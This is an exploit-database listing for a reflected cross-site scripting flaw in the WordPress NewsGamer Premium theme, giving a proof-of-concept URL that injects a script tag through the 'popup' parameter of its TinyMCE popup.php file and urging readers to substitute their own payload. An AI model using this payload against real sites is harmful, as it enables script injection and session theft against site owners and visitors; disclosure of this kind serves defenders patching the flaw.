Wordpress NewsGamer Premium Theme - Cross Site Scripting Vulnerability

2017-05-25T00:00:00
ID 1337DAY-ID-27837
Type zdt
Reporter Talelus
Modified 2017-05-25T00:00:00

Description

An xss vulnerability was found in the Wordpress NewsGamer Premium Theme.#### Usage Info Use your cross site scripting payload

                                        
                                            Proof of Concept (PoC):
=======================
wp-content/themes/newsgamer/wp-admin/tinymce/popup.php?popup=<script>alert(/xss/)</script>

#  0day.today [2018-01-08]  #